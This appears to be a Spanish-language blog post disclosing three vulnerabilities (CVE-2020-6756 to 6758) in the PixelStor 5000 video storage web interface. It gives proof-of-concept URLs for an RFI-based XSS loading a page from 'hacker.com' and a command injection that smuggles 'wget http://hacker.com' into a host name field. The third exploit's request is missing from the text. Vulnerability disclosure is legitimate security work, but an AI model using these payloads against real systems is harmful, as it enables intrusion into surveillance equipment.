PixelStor 5000 (CVE-2020-6756, CVE-2020-6757, CVE-2020-6758)

Realizando un pentest me encontré con el producto PixelStor 5000, un potente video storage que según Rasilient (desarrollador del producto), se encuentra diseñado para sobresalir en instalaciones de vídeovigilancia de alta demanda.

Analizando su aplicación web se encontraron las siguientes vulnerabilidades:

1. XSS a través de un RFI

Proof of Concept (PoC):

http://target.com/Option/optionsAll.php?ContentFrame=http://hacker.com/xss.html
2. Authenticated Remote Code Execution (RCE)

Como prueba de concepto, se ejecutó el comando wget con la dirección del atacante. Como resultado, fue posible obtener una solicitud proveniente desde la IP de la aplicación vulnerable:

Proof of Concept (PoC):

http://target.com/Host/contentHostProperties.php?name=127.0.0.1;wget http://hacker.com
3. Unauthenticated Remote Code Execution (RCE)

Analizando el código de fuente de la aplicación web, se encontró que en el archivo languageOptions.php la variable $lang se inicializa sin sanitizar:

En base a lo anterior, es posible ejecutar código remoto por medio de la siguiente petición POST:

Proof of Concept (PoC):

Conclusión

Como conclusión podemos observar la importancia del desarrollo seguro en productos tan sensibles como lo son un video storage.

Referencia
Compartir

Agregar un comentario